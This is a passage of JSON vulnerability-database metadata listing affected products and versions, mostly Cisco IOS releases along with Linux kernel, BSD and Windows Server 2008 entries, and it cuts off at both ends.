        "vendor": "cisco",
        "version": "12.2\\(16.5\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ea1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ew"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)t4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)sl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(10c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)ya1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zd3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(31\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(13a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ewa4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3.6\\)w5\\(9.0.5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8a\\)ex"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)sxb8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xr6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.63"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)w5\\(20\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)ew5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(21b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(26b\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)s8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ex2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3.3\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(11\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sp"
      },
      {
        "model": "windows server 2008",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(22\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yb5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8\\)sa3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sec"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.57"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)t1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)sp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)e8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(21a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3ha"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)st6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xm"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zm"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xi4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xr2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5a\\)e"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.60"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23.6\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(16\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)sl"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.3.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.5"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.39"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xy6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)t12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)e1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)db"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1ca"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yq3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zk"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ex"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s5a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xd4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23f\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yk"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9a\\)bc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zj2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)yu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xa5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1e"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xm"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)ea4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1.1\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)w5\\(18g\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4.3\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(30\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(10\\)"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(22\\)s5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12.02\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11b\\)e12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(13\\)wt6\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15.1\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)da1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(31\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(4\\)t2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1eu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.21"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(27\\)sbc"
      },
      {
        "model": "midnightbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "midnightbsd",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(16.1\\)b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.29"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xs"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)st1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2za"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(4.3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(15\\)bc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(3.3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17f\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sz"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.30"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(6.8\\)t0a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xs"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ewa1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)yc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)xr2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "2.0.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)sxb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(12\\)s3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)t9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)s3b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5.1\\)xp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)xl3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7.4\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)mc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)s5a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(18.4\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)b2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)db2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)t6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)su2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)t7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xn"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)sc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)dc"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(4\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17b\\)sxa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xs1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sy1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(6f\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sv2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xe4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(18\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)db"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)ya"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sy"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1db"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.28"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2pb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
